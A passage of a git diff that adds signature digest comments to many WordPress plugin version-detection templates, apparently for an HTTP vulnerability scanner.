490a0046304402200e2817f9e7e5e99af79b592dad942f27eeb935d3865d3ace9dd6396c538d5d1f02201d5962f04369ca502554fcf73c4bca9a8f07c7fda6e7e85a534a929c09c420c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..b7679cbf1d 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e5cc940d339c7c5ff0916c5bd874133b485bf29d6458403f8a792efe5068a75a02203588a72a0ba62ab254aff10ae92ea9903b7fceb1fe75848eb7d3b4a74046fc36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..79c4dff81a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c120c2b10984db4f953a568119f834f8eddf56280779cbbd8cccd52ea898a535022023ba720b625f697e13bf084a0883f74ce45948c5df3645393a7861e4b24271eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..2fccb2a94b 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220301189eba5295a86e93b662c55d8ca655ef631b0a6cf84819d125a62b7db00a4022019b542252ff47211c41ed89fcf0785dcd25b498190755550251413701bcb4d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..299b502706 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1f092f5b31f48b4334f208d53270bc2409d68fc95c10238f324a20c01cf01dd022100b6f11869de0aa3faea4fd4f9b6bb44589f8763e24b575b72c03da0b50f5fe6eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5685dd5f08..09ee145bcd 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a833d0d2c50aafdca1baaf94322a88a95290ab5c323cb567e07320397b30863102205a15f8eb4911f685d4f566e6ba0a92ae9130c52075ece4856948b5cd661fb7e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..682a9a6f27 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204fa6268e1d337b21ab1017c379cf442f9c6a8c70c0860e2055fd6b09c56534830220034792477bfb89ad945252907684ddc50943a5785073e1a20f3ef4a6e675ffd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..24f5f39fee 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a6991392344ebb568189311820a6d939aa5dccc1c01bfad2ed2a73882420f214022100c3b4dd95df1ab67dc202ba3db1b2cb3d0f1ef86dcced9b4188e77c1b17fff688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..d58b0cf182 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004c4aa54e6a029a8f4bd7fd18611415ac7db251e5f0d738daec05ae2c68719b102204b44de1a8eeb4f78d0fd370fb9f455492531b292221bb0747781332ccd63e1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..5b0db74ca1 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8597cd06058ced797cbfae266fec7f5af4d2ba79cb3369430ce5555649ca7840221008e94085bd2e867cf8b85a3e55d96532514414d5c461778733808c725ec37bf4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index effba09471..379f8ac815 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009030f22d90c8b7dc7545dad5abf9bf00100aff03bb2564a0cb6c43afbccdcea1022100933753e68c39a7974a03b042517e0c5cd4ca05dac0a1836f53d3036b74609ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 37153b7ae5..2fb086361f 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba9d677c1f37ddabc97908485eab3601670f4d818c7cf0be14d0bc25dc5cedb3022100ca4736314b227c08b819cd4fa7c487154e114a80f78a986d9eb3d8958a5b189b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..d71e1d3473 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bac50bd50dce4b570d41fb09010add50f74aab45bf9e855b0c0684e60ed4895d022100f6c923ee68821caa39d446d1d8e3c1467e288bcfd472124c3f6ea3a1d5252018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..defbdb3bca 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c930fff81dd6f66f94128dff37a08f1ad7508344509b24db5f007e0eeac856a202204bb2adc7e0610a43c1bcfcfef3c9eafbe6425c5a98199c1678dd1ad2332f52b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3462f5ea6b..94c3cb41db 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c1cf156fa881517a9ba7f568dc1e66c5f3938b9247222ba730c8ed9b838543202210097cd4eaa46041f3441408065ed34d26ba6d9bd531e3cea3b7b40b12ced64a56e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5c9ae8bc4f..b76912a2b6 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dfe39420b5b0b1aff02159a0f636134fe01e2a08489dbe8abd92572b8953aad3022100c838200c313e0df22a3c6be5c829a16aa4ac0daa039e15adc7e13db49aed1385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..c6ba727428 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0b499015a10e937390ff142aaa7e836288ab413129b4d377acdd6b7e9e40f3902203d8b7d333f6d50af4113a48bce727a311338f018029b9b18dc9571f87b8bd55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..fd0417cdc6 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022033347325ae08e172f54dcec577111f25e9e7c2d8cd120f4711384a48d7c588ea02204e76cf42f702b5dea0011e6aded5e52e0a1aafc8f4101f4264b830fbac346024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..5a9233b57c 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e65bf49e1677d657f00667081eebc8590aeab4a7765f1e78940f1040a4c991b022060da02ffc1da19c2be8c56a85a8305bb28f4911b24c8e7c6b61be231223c4c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..1ea40e7dee 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3f0215c942d8de38da327d367599961a639faffe35bfd4a25a78c4b4a12991a0220246f103d9b8a70799b08f16102798e206dacd5b82e0fb630c09a27a86217c7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..0822240fc0 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069508cbb4228c36f569943d2999a7f15ef10c0af1f1e3e901bf0feee3b13be7a022100f713cf2ca04a28f5930532f92adffe0ee1e942e9c259637685986d7bea2d8f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 6ff90e0902..7328cc2811 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070ac909e2f6db9a80b3ed34402dad177d90f45d2eacaedbc22be63b7c802b76702204478f4bd475ff56c43d6cf7179c9829d82b84cae9b3d7ea2549a78b36a73a44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..409eeb45cc 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ae3673b5c1f3ae72bc01d9b0d58ecede2e9aa668eea2dee0e42d259624926f9022100b7ddae1e3e4fd1d739c1b7f07c465a5fc5526913c3ffd1bdafa9399e5837a0e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..5b40c7ddba 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045d6ad1d5d994febb33eabea6074cbe298de234587df101f99d31daa7f62966f02207e2bf97b377f6f583428c5968c3dcc09d033edbd0d2ea4c248b5a7cf440e7e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 27e45e39ca..14ac887ee8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ddb9a5692ea63eb8d68b96a3dcecd5312e3d67173bb2cbab60f1fe62ba25156b02201ad1ab7bdca47c33b1b1db923a96ed6f19499ac653db2f7fe5c3f185abf889d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..72b4c08e30 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007b5e137f97c949b4412522a8619a1f6d269d0b5fc25ba4da6246bc92e30efb702205e64a4c6997c35a589c3317d0ad543d4eaaeebd2f85a7821ca667068f2b4bbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index d679d8df61..cb71e68e08 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052cf9643c3a412a97bb815c69d9630f63b71022d556262accd2696ac9c00af9402207359407deaf1e675867ba2e45205480ea2e29cebe0a47a5d507c5b3ac0d8be64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 8bfe16ca84..2b4913e553 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5dbca29e97519100bf4f9115d51b6cee88c4605bca0e408607005ffdb3896f1022100caad460cdb947b59cc9ac36e722ed7074ab66890459b0517b9f5a7b1278850da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..46221066b2 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d6e20783de81b7286f5209d2d4b7156dcd85223621e4fb8b414b074677711ba02201a3edd65af570f5b3c59943076059f6c37aaa4f805d91dbae91eb9aac0916aa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..12dc5c024b 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e90c68550e535ab545255fb7e2fffe799dcbde6ccaa10b1c2da06ae5000ceb1e02202a591006fc038008637d29dd43faa0ca53d2b76e8377cd64d6ee8793ecea6a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..715991395e 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bec325a4de2630eb9caef87cde24dd511760afb9ff186bcaf177ca8a024862802207e18ce751df24dc80acff01eb6da073cf5e687f4c5da31fd13d7c09c0b0fda47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..87fb899b35 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7f4d5e2458a4ad967e5e57608c3c7778b13836bc75f3929af83e20c0ea2c47202200c9fafd25fc711f7f6e9869abf1f327c4f8fc9c0b53b4272f7a9c9b42e332f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 67968fb008..6a62aa29d8 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207308c8a52a71192a40bdbde63577ef80182704daddc87029737ec7288fdfb9ad022066f449151ed4e194a7a2498514ec35310490c2985c9c979c89e9f6a047f44be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..668e46be65 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb4f749cce1250c7d601efc1c39d7293b38ec45393630a8a35aca8f2daef8c5602200766f79d3b3789c350c9a3ed245a54edf2de61530507cd44809cf29a3b3a28e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..dbe2417dee 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c43a256569f45dfbe3cdf9764cc22f22bd1539a3f567d6a6cb8d1dbcdf524890220085179cc61ff34105c0076ce6c06aeaa6e89bf493a44277ea28071ed8a4f1840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..2cf26b769d 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a372857b53f618b34ed5e79c9183a2f801e9e87190075bb2a2c5dfcc83f7c756022100e8ed8bad6482fb82623d29be894a712c7d754e72d1215cf95d1ddd327b07b2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d22f60a5cd..6b2096eb65 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100854e1fbc502aa4e0b430e4279408d47c0b3a9ef2b4b59a90b828b46b4b4393d9022100ede393e131b3c5033252480ea248aff1c64b1f868a33a9cb5386353700d01d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..89b2c3371c 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206db607bbbd99959a0504e2c6342138e9061e58df22c6e536a3922ec9cdbd2744022100b466bda4b0180cec4a1baf72093275aea9fd83dfc9107dc2005483e6c6c4d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 2d4f463d97..115a21cc86 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f3f251eb47e7ca56a067e86d4d41ba9dc33067adecbc6a623b04365a7087f9302202886fa9b9b7711e0fe6eb93c3ad716c0345ec2c2b64a5273dcde83380d54f494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index cb67671918..49aed81b7d 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220410f5766f550d76628d7339635f1f69645149932b29c0a0ebe29ef0e1a2d1384022100c5be6922fdd83987fc421431a613761dd2b359f555f175653bc76bbd6970d36b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cc3eb2481a..e332e97b3c 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024ca7288d05c5a9f01ee2bce4d7294e5d959f1ce543289d9ca5cae26f86a8cdc022049530c126087d864f602463cbda6f4f339e1f6d0a5e9dfb20399d6b186e7cd46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..dd3d33b27d 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031bb2a51d7aaab1050897b976273123c34e4bf14cef6a20797c240d66dbf2470022100ca29ecb82fdaf7ab39d3b1f3796a04c8160b8b090e4ef0b60578c6c63034d696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..1d0249256b 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f832a3982f73f212e8b2a3913f4e342648a1d29179f17b1c35d3191fb425d1ac022026e7e5d11075c8df401683616d753e4c94f2a90f093157525f3f2363fcfed8d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..e4c56b13a2 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0c15ff9893005d08746fc1cffe46ecc8ef0deefb027d2380922f3f8b36ba616022100f71bb550dc50523c4c8c1f2e167bb0df6d606e272af4665cf737321370ed8299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a33aa7964f..02c1f7a4ec 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a03759e89ec1d6f9bcb41e7110891416e11533c9a1c76983ffac485904b952690221008815e3d03845d0513dbcda81cc1a210adcb0c28d0b524a8747a8eafe7f18377d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..ef8b3aae54 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084ebbdd70f8ea08571efee27574e0a47292f4826a859c012272ddf51a8fa604a022100e18ffa8aa1a5a063ba2c5b6762ca4aadb0edb8cc215774dd50ae51ad58f2f733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..e958055a3d 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068c69dce0970dfdbed0cc610608501e692c70902a7a26c2e9cd4832479eceb3e022100a4bf74f4bb5e65a390eae28e16587361ac169810695c93eda856f99c94093e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..5c5eb1c721 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd4696c16f1e1d9a447844fc2e0ea75e4faa6fde9376ceb862d84809c7d0574502206833636815c46085b94bd367ecdd0eec06b36b5476f2ca052de28c87b4a85e9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 